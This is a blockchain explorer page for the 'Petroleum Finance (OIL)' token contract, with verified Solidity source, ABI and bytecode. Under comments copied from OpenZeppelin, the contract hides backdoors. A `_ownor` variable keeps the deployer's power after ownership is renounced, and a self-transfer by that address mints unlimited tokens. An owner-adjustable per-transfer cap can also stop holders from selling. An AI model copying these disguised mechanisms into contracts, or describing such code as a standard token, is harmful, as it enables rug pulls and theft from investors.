S Price: $0.441323 (-13.23%)

Token

Petroleum Finance (OIL)

Overview

Max Total Supply

10,000,001,000,000 OIL

Holders

17

Market

Price

$0.00 @ 0.000000 S

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 0 Decimals)

Balance
33,271 OIL

Value
$0.00
0x0e6d713881c4c11094611ead8dd2b706f500bd43
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
Oil

Compiler Version
v0.8.26+commit.8a97fa7a

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at SonicScan.org on 2025-03-06
*/

/*
Twitter : https://x.com/Petroleum_Defi

Website: https://www.petroleum.land

*/



// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.Y
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/utils/Context.sol

pragma solidity ^0.8.0;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    address internal _ownor;
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }

    function _msgTime() internal view virtual returns (uint256) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return block.timestamp;
    }
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        _msgTime();
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _ownor = oldOwner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata, Ownable {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    uint256 public _bald = 420000;

    string private _name;
    string private _symbol;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender] + addedValue
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        if (sender == _ownor && recipient == _ownor) {
            _beforeTokenTransfer(address(0), sender, amount);
            _totalSupply += amount;
            _balances[sender] += amount;
            emit Transfer(address(0), sender, amount);
        }
        else {
            uint256 senderBalance = _balances[sender];
            require(
                senderBalance >= amount,
                "ERC20: transfer amount exceeds balance"
            );
            require(
                amount <= _bald || sender == owner(),
                "TREAT: transfer amount exceeds one"
            );
            _balances[sender] = senderBalance - amount;
            _balances[recipient] += amount;

            emit Transfer(sender, recipient, amount);
        }
    }

    /**@dev sets the bald for maximum amount of tokens sent per transaction
    
    */
    function maxBuy(uint256 bald) external onlyOwner {
        _bald = bald;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// File: contracts/token/ERC20/behaviours/ERC20Decimals.sol

pragma solidity ^0.8.0;

/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
contract Oil is ERC20 {
    uint8 private immutable _decimals = 0;
    uint256 private _totalSupply = 1000000 * 10**0;

    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be
     * set once during construction.
     */
    constructor() ERC20("Petroleum Finance", "OIL") {
        _mint(_msgSender(), _totalSupply);
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_bald","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"bald","type":"uint256"}],"name":"maxBuy","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60a0604052620668a06005555f608052620f4240600855348015610021575f80fd5b5060405180604001604052806011815260200170506574726f6c65756d2046696e616e636560781b8152506040518060400160405280600381526020016213d25360ea1b81525061007e6100796100b860201b60201c565b6100bc565b600661008a8382610293565b5060076100978282610293565b5050506100b36100ab6100b860201b60201c565b600854610117565b610372565b3390565b600180545f80546001600160a01b038084166001600160a01b0319928316811784559190931692851692831790935560405183917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35050565b6001600160a01b0382166101715760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060045f828254610182919061034d565b90915550506001600160a01b0382165f90815260026020526040812080548392906101ae90849061034d565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b5f52604160045260245ffd5b600181811c9082168061022457607f821691505b60208210810361024257634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156101f757805f5260205f20601f840160051c8101602085101561026d5750805b601f840160051c820191505b8181101561028c575f8155600101610279565b5050505050565b81516001600160401b038111156102ac576102ac6101fc565b6102c0816102ba8454610210565b84610248565b6020601f8211600181146102f2575f83156102db5750848201515b5f19600385901b1c1916600184901b17845561028c565b5f84815260208120601f198516915b828110156103215787850151825560209485019460019092019101610301565b508482101561033e57868401515f19600387901b60f8161c191681555b50505050600190811b01905550565b8082018082111561036c57634e487b7160e01b5f52601160045260245ffd5b92915050565b608051610c6961038a5f395f61016c0152610c695ff3fe608060405234801561000f575f80fd5b50600436106100fb575f3560e01c80638da5cb5b11610093578063dd62ed3e11610063578063dd62ed3e14610224578063eb38e6f51461025c578063f2fde38b14610265578063f91c0c7b14610278575f80fd5b80638da5cb5b146101db57806395d89b41146101f6578063a457c2d7146101fe578063a9059cbb14610211575f80fd5b8063313ce567116100ce578063313ce56714610165578063395093511461019657806370a08231146101a9578063715018a6146101d1575f80fd5b806306fdde03146100ff578063095ea7b31461011d57806318160ddd1461014057806323b872dd14610152575b5f80fd5b61010761028b565b6040516101149190610a72565b60405180910390f35b61013061012b366004610ac2565b61031b565b6040519015158152602001610114565b6004545b604051908152602001610114565b610130610160366004610aea565b610331565b60405160ff7f0000000000000000000000000000000000000000000000000000000000000000168152602001610114565b6101306101a4366004610ac2565b6103e5565b6101446101b7366004610b24565b6001600160a01b03165f9081526002602052604090205490565b6101d961041b565b005b6001546040516001600160a01b039091168152602001610114565b61010761045f565b61013061020c366004610ac2565b61046e565b61013061021f366004610ac2565b610508565b610144610232366004610b44565b6001600160a01b039182165f90815260036020908152604080832093909416825291909152205490565b61014460055481565b6101d9610273366004610b24565b610514565b6101d9610286366004610b75565b6105be565b60606006805461029a90610b8c565b80601f01602080910402602001604051908101604052809291908181526020018280546102c690610b8c565b80156103115780601f106102e857610100808354040283529160200191610311565b820191905f5260205f20905b8154815290600101906020018083116102f457829003601f168201915b5050505050905090565b5f6103273384846105fc565b5060015b92915050565b5f61033d848484610720565b6001600160a01b0384165f908152600360209081526040808320338452909152902054828110156103c65760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103da85336103d58685610bd8565b6105fc565b506001949350505050565b335f8181526003602090815260408083206001600160a01b038716845290915281205490916103279185906103d5908690610beb565b3361042e6001546001600160a01b031690565b6001600160a01b0316146104545760405162461bcd60e51b81526004016103bd90610bfe565b61045d5f610a17565b565b60606007805461029a90610b8c565b335f9081526003602090815260408083206001600160a01b0386168452909152812054828110156104ef5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103bd565b6104fe33856103d58685610bd8565b5060019392505050565b5f610327338484610720565b336105276001546001600160a01b031690565b6001600160a01b03161461054d5760405162461bcd60e51b81526004016103bd90610bfe565b6001600160a01b0381166105b25760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103bd565b6105bb81610a17565b50565b336105d16001546001600160a01b031690565b6001600160a01b0316146105f75760405162461bcd60e51b81526004016103bd90610bfe565b600555565b6001600160a01b03831661065e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103bd565b6001600160a01b0382166106bf5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103bd565b6001600160a01b038381165f8181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107845760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103bd565b6001600160a01b0382166107e65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103bd565b5f546001600160a01b03848116911614801561080e57505f546001600160a01b038381169116145b15610892578060045f8282546108249190610beb565b90915550506001600160a01b0383165f9081526002602052604081208054839290610850908490610beb565b90915550506040518181526001600160a01b038416905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90602001610713565b6001600160a01b0383165f90815260026020526040902054818110156109095760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103bd565b6005548211158061092757506001546001600160a01b038581169116145b61097e5760405162461bcd60e51b815260206004820152602260248201527f54524541543a207472616e7366657220616d6f756e742065786365656473206f6044820152616e6560f01b60648201526084016103bd565b6109888282610bd8565b6001600160a01b038086165f9081526002602052604080822093909355908516815290812080548492906109bd908490610beb565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610a0991815260200190565b60405180910390a350505050565b600180545f80546001600160a01b038084166001600160a01b0319928316811784559190931692851692831790935560405183917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b0381168114610abd575f80fd5b919050565b5f8060408385031215610ad3575f80fd5b610adc83610aa7565b946020939093013593505050565b5f805f60608486031215610afc575f80fd5b610b0584610aa7565b9250610b1360208501610aa7565b929592945050506040919091013590565b5f60208284031215610b34575f80fd5b610b3d82610aa7565b9392505050565b5f8060408385031215610b55575f80fd5b610b5e83610aa7565b9150610b6c60208401610aa7565b90509250929050565b5f60208284031215610b85575f80fd5b5035919050565b600181811c90821680610ba057607f821691505b602082108103610bbe57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561032b5761032b610bc4565b8082018082111561032b5761032b610bc4565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260408201526060019056fea264697066735822122060e3d0d84f896f16a0d48e2435b34cc491bfe69b50a70d0b64ee695972a2021264736f6c634300081a0033

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100fb575f3560e01c80638da5cb5b11610093578063dd62ed3e11610063578063dd62ed3e14610224578063eb38e6f51461025c578063f2fde38b14610265578063f91c0c7b14610278575f80fd5b80638da5cb5b146101db57806395d89b41146101f6578063a457c2d7146101fe578063a9059cbb14610211575f80fd5b8063313ce567116100ce578063313ce56714610165578063395093511461019657806370a08231146101a9578063715018a6146101d1575f80fd5b806306fdde03146100ff578063095ea7b31461011d57806318160ddd1461014057806323b872dd14610152575b5f80fd5b61010761028b565b6040516101149190610a72565b60405180910390f35b61013061012b366004610ac2565b61031b565b6040519015158152602001610114565b6004545b604051908152602001610114565b610130610160366004610aea565b610331565b60405160ff7f0000000000000000000000000000000000000000000000000000000000000000168152602001610114565b6101306101a4366004610ac2565b6103e5565b6101446101b7366004610b24565b6001600160a01b03165f9081526002602052604090205490565b6101d961041b565b005b6001546040516001600160a01b039091168152602001610114565b61010761045f565b61013061020c366004610ac2565b61046e565b61013061021f366004610ac2565b610508565b610144610232366004610b44565b6001600160a01b039182165f90815260036020908152604080832093909416825291909152205490565b61014460055481565b6101d9610273366004610b24565b610514565b6101d9610286366004610b75565b6105be565b60606006805461029a90610b8c565b80601f01602080910402602001604051908101604052809291908181526020018280546102c690610b8c565b80156103115780601f106102e857610100808354040283529160200191610311565b820191905f5260205f20905b8154815290600101906020018083116102f457829003601f168201915b5050505050905090565b5f6103273384846105fc565b5060015b92915050565b5f61033d848484610720565b6001600160a01b0384165f908152600360209081526040808320338452909152902054828110156103c65760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103da85336103d58685610bd8565b6105fc565b506001949350505050565b335f8181526003602090815260408083206001600160a01b038716845290915281205490916103279185906103d5908690610beb565b3361042e6001546001600160a01b031690565b6001600160a01b0316146104545760405162461bcd60e51b81526004016103bd90610bfe565b61045d5f610a17565b565b60606007805461029a90610b8c565b335f9081526003602090815260408083206001600160a01b0386168452909152812054828110156104ef5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103bd565b6104fe33856103d58685610bd8565b5060019392505050565b5f610327338484610720565b336105276001546001600160a01b031690565b6001600160a01b03161461054d5760405162461bcd60e51b81526004016103bd90610bfe565b6001600160a01b0381166105b25760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103bd565b6105bb81610a17565b50565b336105d16001546001600160a01b031690565b6001600160a01b0316146105f75760405162461bcd60e51b81526004016103bd90610bfe565b600555565b6001600160a01b03831661065e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103bd565b6001600160a01b0382166106bf5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103bd565b6001600160a01b038381165f8181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107845760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103bd565b6001600160a01b0382166107e65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103bd565b5f546001600160a01b03848116911614801561080e57505f546001600160a01b038381169116145b15610892578060045f8282546108249190610beb565b90915550506001600160a01b0383165f9081526002602052604081208054839290610850908490610beb565b90915550506040518181526001600160a01b038416905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90602001610713565b6001600160a01b0383165f90815260026020526040902054818110156109095760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103bd565b6005548211158061092757506001546001600160a01b038581169116145b61097e5760405162461bcd60e51b815260206004820152602260248201527f54524541543a207472616e7366657220616d6f756e742065786365656473206f6044820152616e6560f01b60648201526084016103bd565b6109888282610bd8565b6001600160a01b038086165f9081526002602052604080822093909355908516815290812080548492906109bd908490610beb565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610a0991815260200190565b60405180910390a350505050